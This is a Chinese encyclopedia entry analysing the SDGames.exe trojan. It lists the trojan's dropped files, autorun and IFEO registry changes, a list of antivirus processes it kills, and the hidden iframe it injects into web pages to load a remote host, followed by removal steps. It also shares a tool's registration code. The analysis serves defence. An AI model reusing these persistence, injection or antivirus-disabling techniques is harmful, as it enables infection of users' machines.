词条 | SDGames.exe |
释义 | 恶性病毒 SDGames.exe(小瓢虫) 文件名称:SDGames.exe 文件大小:59282 byte A V命名: Trojan.Win32.VB.yth(瑞星) Trojan-Downloader.Win32.VB.lg(卡巴斯基) Win32.Troj.Downloader.vb.237568(金山) 加壳方式:北斗4.1 编写语言:Microsoft Visual Basic 5.0 / 6.0 文件MD5:fc334ffcf5aff3ca8235705d61f62990 主要表现为: 1.攻击杀毒软件之后进行IFEO映像劫持 2.感染htm等网页文件 3.感染或覆盖exe等可执行文件 4.破坏安全模式 5.破坏显示隐藏文件 文件夹选项等 6.修改系统时间并锁定时间 7.可通过U盘等移动存储传播 8.关闭Windows防火墙等服务并打开许多危险服务,并使得用户磁盘被共享 9.后台添加账户并设定管理员权限 10.修改某些文件关联 下面为具体分析 File: SDGames.exe Size: 59282 bytes File Version: 3.02 Modified: 2007年12月6日, 17:56:32 MD5: FC334FFCF5AFF3CA8235705D61F62990 SHA1: 4DFFE9E9BB666A13CC646EBA4371BDF4AFFB49BC CRC32: 1DD096C2 1.病毒运行后,释放如下文件或副本 %systemroot%\\system32\\SDGames.exe %systemroot%\\system32\\Taskeep.vbs %systemroot%\\system32\\Avpser.cmd %systemroot%\\system32\etshare.cmd %systemroot%\\system32\\AUTORUN.INF 在每个磁盘分区释放SDGames.exe和AUTORUN.INF 达到通过U盘传播的目的 并且在每个分区释放Windows.url,新建文件夹.url,Recycleds.url指向该分区根目录下的SDGames.exe 诱使用户点击 2.修改reg和txt文件关联指向%systemroot%\\system32\\SDGames.exe 3.删除HKLM\\System\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\{4D36E967-E325-11CE-BFC1-08002BE10318} HKLM\\System\\CurrentControlSet\\Control\\SafeBoot\etwork\\{4D36E967-E325-11CE-BFC1-08002BE10318} HKLM\\System\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\{4D36E967-E325-11CE-BFC1-08002BE10318} HKLM\\System\\CurrentControlSet\\Control\\SafeBoot\etwork\\{4D36E967-E325-11CE-BFC1-08002BE10318} 破坏安全模式 4.创建自启动项目 [HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows] <load><%systemroot%\\system32\\SDGames.exe> [SDGame] <run><%systemroot%\\system32\\SDGames.exe> [SDGame] [HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run] <Winstary><%systemroot%\\system32\\SDGames.exe> [SDGame] 5.破坏系统的一些功能 禁用cmd:HKCU\\Software\\Policies\\Microsoft\\Windows\\System\\DisableCMD 破坏显示隐藏文件:HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL\\CheckedValue 使得文件扩展名无法显示:HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt 隐藏控制面板: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\oControlPanel 禁用注册表编辑器 HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistrytools 禁用任务管理器 HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskMgr 修改IE主页为:http://www.*.10mb.cn 修改IE默认页为:wangma 隐藏文件夹选项 HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\oFolderOptions 6.关闭如下服务并将其启动类型设为禁用 Alg sharedaccess wuauserv 7.开启下列服务并将其启动类型设为自动 Terminal Services winmgmt lanmanserver 8.%systemroot%\\system32\etshare.cmd将用户的所有磁盘设为共享 9.添加一个名为guest的账户,并将其设置为管理员权限 10.攻击反病毒软件,利用Avpser.cmd强制结束一些杀毒软件进程 RavMonD.exe RavStub.exe Anti* AgentSvr* CCenter* Rsaupd* SmartUp* FileDsty* RegClean* 360tray* 360safe* kabaload* safelive* KASTask* kpFW32* kpFW32X* KvXP_1* KVMonXP_1* KvReport* KvXP* KVMonXP* nter* TrojDie* avp.com KRepair.COM Trojan* KvNative* Virus* Filewall* Kaspersky* JiangMin* RavMonD* RavStub* RavTask* adam* cSet* PFWliveUpdate* mmqczj* Trojanwall* Ras.exe runiep.exe avp.exe PFW.exe rising* ikaka* .duba* kingsoft* 木马* 社区* aswBoot* MainCon* Regs* AVP* Task* regedit* Ras* srgui* norton* avp* fire* spy* bullguard* PersFw* KAV* ZONEALARM* SAFEWEB* OUTPOST* ESAFE* clear* BLACKICE* 360safe.exe Shadowservice.exe v3webnt.exe v3sd32.exe v3monsvc.exe sysmonnt.exe hkcmd.exe DNTUS26.EXE AhnSD.exe CTFMON.EXE MonsysNT.exe awrem32.exe WINAW32.EXE PNTIOMON.exe avgw.exe avgcc32.exe PROmon.exe PNTIOMON.exe MagicSet.exe MainCon.exe TrCleaner.exe WmNetPro.exe 修复* 保护* 11.映像劫持杀毒软件和一些常用工具 360rpt.exe 360Safe.exe 360tray.EXE adam.exe AgentSvr.exe AppSvc32.exe autoruns.exe avgrssvc.exe AvMonitor.exe avp.com avp.exe CCenter.exe ccSvcHst.exe FileDsty.exe FTCleanerShell.exe HijackThis.exe IceSword.exe iparmo.exe Iparmor.exe isPwdSvc.exe kabaload.exe KaScrScn.SCR KASMain.exe KASTask.exe KAV32.exe KAVDX.exe KAVPFW.exe KAVSetup.exe KAVStart.exe KISLnchr.exe KMailMon.exe KMFilter.exe Knod32kui.exe KPFW32.exe KPFW32X.exe KPFWSvc.exe KRegEx.exe KRepair.COM KsLoader.exe KVCenter.kxp KvDetect.exe KvfwMcl.exe KVMonXP.kxp KVMonXP_1.kxp kvol.exe kvolself.exe KvReport.kxp KVScan.kxp KVSrvXP.exe KVStub.kxp kvupload.exe kvwsc.exe KvXP.kxp KvXP_1.kxp KWatch9x.exe KWatchX.exe loaddll.exe MagicSet.exe MainCon.exe mcconsol.exe mmqczj.exe mmsk.exe msconfig.exe NAVSetup.exe nod32krn.exe PFW.exe PFWLiveUpdate.exe QHSET.exe QQ.exe Ras.exe Rav.exe RavMon.exe RavMonD.exe RavStub.exe RavTask.exe RegClean.exe rfwcfg.exe RfwMain.exe rfwProxy.exe rfwsrv.exe Rsaupd.exe runiep.exe safelive.exe scan32.exe Shadowservice.exe shcfg32.exe SmartUp.exe SREng.exe srgui.exe symlcsvc.exe SysSafe.exe TrojanDetector.exe Trojanwall.exe TrojDie.kxp UIHost.exe UmxAgent.exe UmxAttachment.exe UmxCfg.exe UmxFwHlp.exe UmxPol.exe UpLive.EXE.exe WoptiClean.exe zxsweep.exe 12.遍历感染非系统分区的exe文件(覆盖方式) 13.遍历感染非系统分区的jsp asp php htm html hta文件 在其末尾加入<iframe id="iframe" width="0" height="0" scrolling="no" frameborder="0" src="http://*.10mb.cn/" name="Myframe" align="center" border="0">的代码 14.修改系统时间的年份为2030年,并禁止用户修改时间 15.隐藏系统文件夹 解决办法: 下载sreng:http://download.kztechs.com/files/sreng2.zip Icesword:http://mail.ustc.edu.cn/~jfpan/download/IceSword122cn.zip 1.解压缩Icesword 把Icesword改名为1.exe运行 进程中 找到SDGames.exe 右击它 结束进程 然后点击 Icesword左下角的 文件 按钮 找到如下文件并删除 %systemroot%\\system32\\SDGames.exe %systemroot%\\system32\\Taskeep.vbs %systemroot%\\system32\\Avpser.cmd %systemroot%\\system32\etshare.cmd %systemroot%\\system32\\AUTORUN.INF 以及各个分区下面的 SDGames.exe,AUTORUN.INF,Windows.url,新建文件夹.url,Recycleds.url 2.运行sreng (由于时间已经被改为2030年 所以sreng会弹出过期提示,不用担心,输入下面的授权码即可使用) 用户名:teyqiu 授权号:26129027541185431409013556 打开sreng后 点击 系统修复-文件关联-修复 系统修复-Windows Shell/IE -全选-修复 高级修复-修复安全模式 3.还是sreng中 启动项目 注册表 删除如下项目 [HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows] <load><%systemroot%\\system32\\SDGames.exe> [SDGame] <run><%systemroot%\\system32\\SDGames.exe> [SDGame] [HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run] <Winstary><%systemroot%\\system32\\SDGames.exe> [SDGame] 并删除所有红色的IFEO项目 启动项目 System.ini 删除Windows节点 4.取消磁盘共享 开始 运行 输入cmd 输入如下命令 net share c /delete net share d /delete ... 以此类推 分别取消所有磁盘分区的共享 5.显示系统文件夹 开始 运行 输入cmd 输入如下命令 attrib -h %systemroot%\\system32 6.修复受感染的htm等网页文件 推荐使用CSI的iframkill 下载地址:http://www.vaid.cn/blog/read.php?9 |
随便看 |
百科全书收录4421916条中文百科知识,基本涵盖了大多数领域的百科知识,是一部内容开放、自由的电子版百科全书。